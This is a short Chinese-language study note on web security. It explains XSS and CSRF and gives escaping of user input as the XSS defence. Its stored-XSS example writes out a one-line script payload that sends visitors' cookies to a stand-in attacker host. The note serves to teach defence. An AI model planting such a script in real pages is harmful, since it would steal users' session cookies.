XSS:
概念:
- 全称是跨站脚本攻击(Cross Site Scripting),指攻击者
在网页中嵌入恶意脚本程序。
案列:
- 比如说我写了一个博客网站,然后攻击者在上面发布了一个文章,内容是这样
<script>window.open(“www.gongji.com?param=”+document.cookie)</script>
,如果我没有对他的内容进行处理,直接存储到数据库,那么下一次当其他用户访问他的这篇文章的时候,服务器从数据库读取后然后响应给客户端,浏览器执行了这段脚本,然后就把该用户的cookie发送到攻击者的服务器了。
被攻击的原因:
- 用户输入的数据变成了代码,比如说上面的
预防:
- 将输入的数据进行转义处理,比如说将 < 转义成<
CSRF:
概念:
- 全称是跨站请求伪造
(cross site request forgery)
,指通过伪装成受信任用户的进行访问,通俗的讲就是说我访问了A网站,然后cookie存入了浏览器,然后我又访问了一个流氓网站,不小心点了流氓网站一个链接(向A发送请求),这个时候流氓网站利用了我的身份对A进行了访问。